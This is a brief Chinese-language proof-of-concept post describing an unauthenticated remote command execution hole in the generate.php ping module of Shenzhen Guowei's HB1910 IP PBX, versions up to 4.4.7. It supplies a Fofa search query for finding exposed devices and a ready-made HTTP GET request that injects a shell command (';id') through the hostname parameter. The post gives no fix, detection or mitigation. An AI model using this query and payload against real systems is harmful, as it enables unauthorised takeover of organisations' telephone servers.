0x01 产品描述：

        深圳国威主营国威模拟、数字、IP 交换机、语音网关、IP 电话机及各种电话机。深圳国威电子有限公司HB1910是一款功能强大的网络通信设备，适用于各种企业通信需求。

0x02 漏洞描述：

        深圳国威电子有限公司HB1910数字IP程控交换机generate.php存在远程命令执行漏洞，未经授权的攻击者可利用该漏洞远程执行命令以获取服务器权限。

0x03 影响版本：

HB1910 <= 4.4.7

0x04 搜索语句：

Fofa：body="themes/tenant/css/login.css"

0x05 漏洞复现：

GET /modules/ping/generate.php?send=Ping&hostname=;id HTTP/1.1
Content-Type: application/json
Host: your-ip